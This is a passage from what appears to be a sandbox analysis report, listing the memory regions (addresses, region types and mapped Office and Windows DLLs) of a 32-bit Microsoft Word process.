filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll")
Region:
id = 384
start_va = 0x6fb30000
end_va = 0x6fd04fff
monitored = 0
entry_point = 0x6fb31000
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll")
Region:
id = 385
start_va = 0x6fff0000
end_va = 0x6fffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000006fff0000"
filename = ""
Region:
id = 386
start_va = 0x70910000
end_va = 0x70a9ffff
monitored = 0
entry_point = 0x709ad026
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll")
Region:
id = 387
start_va = 0x70aa0000
end_va = 0x70b22fff
monitored = 0
entry_point = 0x70ab13b0
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll")
Region:
id = 388
start_va = 0x70b30000
end_va = 0x70bb2fff
monitored = 0
entry_point = 0x70b6791c
region_type = mapped_file
name = "d3d11.dll"
filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll")
Region:
id = 389
start_va = 0x70bc0000
end_va = 0x72821fff
monitored = 0
entry_point = 0x70bc1000
region_type = mapped_file
name = "wwlib.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wwlib.dll")
Region:
id = 390
start_va = 0x72830000
end_va = 0x72832fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 391
start_va = 0x72840000
end_va = 0x72842fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 392
start_va = 0x72850000
end_va = 0x72852fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 393
start_va = 0x72860000
end_va = 0x72862fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 394
start_va = 0x72870000
end_va = 0x72872fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 395
start_va = 0x72880000
end_va = 0x72882fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 396
start_va = 0x72890000
end_va = 0x7296bfff
monitored = 0
entry_point = 0x728bc130
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\ucrtbase.dll")
Region:
id = 397
start_va = 0x72970000
end_va = 0x72986fff
monitored = 0
entry_point = 0x72971c9d
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")
Region:
id = 398
start_va = 0x72990000
end_va = 0x72a5afff
monitored = 0
entry_point = 0x729a6a2b
region_type = mapped_file
name = "c2r32.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")
Region:
id = 399
start_va = 0x72a60000
end_va = 0x72ac4fff
monitored = 0
entry_point = 0x72a7fa6c
region_type = mapped_file
name = "appvisvstream32.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")
Region:
id = 400
start_va = 0x72ad0000
end_va = 0x72c84fff
monitored = 0
entry_point = 0x72bc3d5a
region_type = mapped_file
name = "appvisvsubsystems32.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll")
Region:
id = 401
start_va = 0x72e60000
end_va = 0x73018fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 402
start_va = 0x73020000
end_va = 0x7325ffff
monitored = 0
entry_point = 0x730266bd
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll")
Region:
id = 403
start_va = 0x73480000
end_va = 0x73482fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-utility-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll")
Region:
id = 404
start_va = 0x73490000
end_va = 0x73492fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-environment-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll")
Region:
id = 405
start_va = 0x734a0000
end_va = 0x734a2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-filesystem-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll")
Region:
id = 406
start_va = 0x734b0000
end_va = 0x734b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-time-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll")
Region:
id = 407
start_va = 0x734c0000
end_va = 0x734c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-multibyte-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll")
Region:
id = 408
start_va = 0x734d0000
end_va = 0x734d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-math-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll")
Region:
id = 409
start_va = 0x734e0000
end_va = 0x734e2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-locale-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll")
Region:
id = 410
start_va = 0x734f0000
end_va = 0x734f3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 411
start_va = 0x73500000
end_va = 0x73503fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 412
start_va = 0x73510000
end_va = 0x73512fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 413
start_va = 0x73520000
end_va = 0x73523fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 414
start_va = 0x73660000
end_va = 0x73674fff
monitored = 0
entry_point = 0x7366b1a0
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll")
Region:
id = 415
start_va = 0x73680000
end_va = 0x736ecfff
monitored = 0
entry_point = 0x736bab20
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll")
Region:
id = 416
start_va = 0x73730000
end_va = 0x7375dfff
monitored = 0
entry_point = 0x737316ed
region_type = mapped_file
name = "mlang.dll"
filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll")
Region:
id = 417
start_va = 0x73fa0000
end_va = 0x74094fff
monitored = 0
entry_point = 0x73fb0d9e
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 418
start_va = 0x741b0000
end_va = 0x741b3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 419
start_va = 0x741c0000
end_va = 0x741eefff
monitored = 0
entry_point = 0x741c1142
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll")
Region:
id = 420
start_va = 0x74270000
end_va = 0x742aafff
monitored = 0
entry_point = 0x7427128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 421
start_va = 0x742b0000
end_va = 0x742c6fff
monitored = 0
entry_point = 0x742b3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 422
start_va = 0x742d0000
end_va = 0x742d4fff
monitored = 0
entry_point = 0x742d10f6
region_type = mapped_file
name = "msimg32.dll"
filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll")
Region:
id = 423
start_va = 0x74310000
end_va = 0x7431ffff
monitored = 0
entry_point = 0x743138c1
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll")
Region:
id = 424
start_va = 0x74410000
end_va = 0x74422fff
monitored = 0
entry_point = 0x74411d3f
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 425
start_va = 0x74430000
end_va = 0x7443dfff
monitored = 0
entry_point = 0x74431235
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 426
start_va = 0x74460000
end_va = 0x744dffff
monitored = 0
entry_point = 0x744737c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 427
start_va = 0x74520000
end_va = 0x74528fff
monitored = 0
entry_point = 0x74521220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 428
start_va = 0x745b0000
end_va = 0x745d0fff
monitored = 0
entry_point = 0x745b145e
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 429
start_va = 0x745e0000
end_va = 0x745eafff
monitored = 0
entry_point = 0x745e1992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 430
start_va = 0x745f0000
end_va = 0x7478dfff
monitored = 0
entry_point = 0x7461e6b5
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 431
start_va = 0x75250000
end_va = 0x75257fff
monitored = 0
entry_point = 0x752520f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 432
start_va = 0x75260000
end_va = 0x752bbfff
monitored = 0
entry_point = 0x7529f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 433
start_va = 0x752c0000
end_va = 0x752fefff
monitored = 0
entry_point = 0x752ee088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 434
start_va = 0x75520000
end_va = 0x7552bfff
monitored = 0
entry_point = 0x755210e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 435
start_va = 0x75530000
end_va = 0x7558ffff
monitored = 0
entry_point = 0x7554a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 436
start_va = 0x75610000
end_va = 0x75644fff
monitored = 0
entry_point = 0x7561145d
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 437
start_va = 0x75650000
end_va = 0x75770fff
monitored = 0
entry_point = 0x7565158e
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 438
start_va = 0x75780000
end_va = 0x75789fff
monitored = 0
entry_point = 0x757836a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 439
start_va = 0x757f0000
end_va = 0x7587efff
monitored = 0
entry_point = 0x757f3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 440
start_va = 0x75bc0000
end_va = 0x75caffff
monitored = 0
entry_point = 0x75bd0569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 441
start_va = 0x75cb0000
end_va = 0x768f9fff
monitored = 0
entry_point = 0x75d31601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 442
start_va = 0x76900000
end_va = 0x76918fff
monitored = 0
entry_point = 0x76904975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 443
start_va = 0x769b0000
end_va = 0x76abffff
monitored = 0
entry_point = 0x769c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 444
start_va = 0x76ac0000
end_va = 0x76b5cfff
monitored = 0
entry_point = 0x76af3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 445
start_va = 0x76b60000
end_va = 0x76b8efff
monitored = 0
entry_point = 0x76b62a35
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")
Region:
id = 446
start_va = 0x76b90000
end_va = 0x76beffff
monitored = 0
entry_point = 0x76ba158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 447
start_va = 0x76bf0000
end_va = 0x76c01fff
monitored = 0
entry_point = 0x76bf1441
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 448
start_va = 0x76c10000
end_va = 0x76c15fff
monitored = 0
entry_point = 0x76c11782
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 449
start_va = 0x76c20000
end_va = 0x76cbffff
monitored = 0
entry_point = 0x76c349e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 450
start_va = 0x76cc0000
end_va = 0x76d6bfff
monitored = 0
entry_point = 0x76cca472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 451
start_va = 0x76d70000
end_va = 0x76d7bfff
monitored = 0
entry_point = 0x76d7238e
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 452
start_va = 0x76e80000
end_va = 0x76fdbfff
monitored = 0
entry_point = 0x76ecba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 453
start_va = 0x76fe0000
end_va = 0x77026fff
monitored = 0
entry_point = 0x76fe74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 454
start_va = 0x77030000
end_va = 0x771ccfff
monitored = 0
entry_point = 0x770317e7
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 455
start_va = 0x771d0000
end_va = 0x77226fff
monitored = 0
entry_point = 0x771e9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 456
start_va = 0x77240000
end_va = 0x772cffff
monitored = 0
entry_point = 0x77256343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 457
start_va = 0x772d0000
end_va = 0x77314fff
monitored = 0
entry_point = 0x772d11e1
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 458
start_va = 0x77320000
end_va = 0x773a2fff
monitored = 0
entry_point = 0x773223d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 459
start_va = 0x773b0000
end_va = 0x774affff
monitored = 0
entry_point = 0x773cb6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 460
start_va = 0x774b0000
end_va = 0x7757bfff
monitored = 0
entry_point = 0x774b168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 461
start_va = 0x77580000
end_va = 0x775a6fff
monitored = 0
entry_point = 0x775858b9
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 462
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000775e0000"
filename = ""
Region:
id = 463
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000776e0000"
filename = ""
Region:
id = 464
start_va = 0x77800000
end_va = 0x779a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 465
start_va = 0x779b0000
end_va = 0x779b4fff
monitored = 0
entry_point = 0x779b1438
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 466
start_va = 0x779e0000
end_va = 0x77b5ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 467
start_va = 0x7ef70000
end_va = 0x7ef7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef70000"
filename = ""
Region:
id = 468
start_va = 0x7ef80000
end_va = 0x7ef8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef80000"
filename = ""
Region:
id = 469
start_va = 0x7ef92000
end_va = 0x7ef94fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef92000"
filename = ""
Region:
id = 470
start_va = 0x7ef95000
end_va = 0x7ef97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef95000"
filename = ""
Region:
id = 471
start_va = 0x7ef98000
end_va = 0x7ef9afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef98000"
filename = ""
Region:
id = 472
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Region:
id = 473
start_va = 0x7ef9e000
end_va = 0x7efa0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 474
start_va = 0x7efa1000
end_va = 0x7efa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 475
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 476
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 477
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 478
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 479
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 480
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 481
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 482
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 483
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 484
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 485
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 486
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 487
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 488
start_va = 0x3ab0000
end_va = 0x3aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003ab0000"
filename = ""
Region:
id = 489
start_va = 0x8bc0000
end_va = 0x8cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008bc0000"
filename = ""
Region:
id = 490
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 491
start_va = 0x733e0000
end_va = 0x733f6fff
monitored = 0
entry_point = 0x733ed36d
region_type = mapped_file
name = "msohev.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msohev.dll")
Region:
id = 492
start_va = 0x210000
end_va = 0x211fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 493
start_va = 0x753e0000
end_va = 0x75404fff
monitored = 0
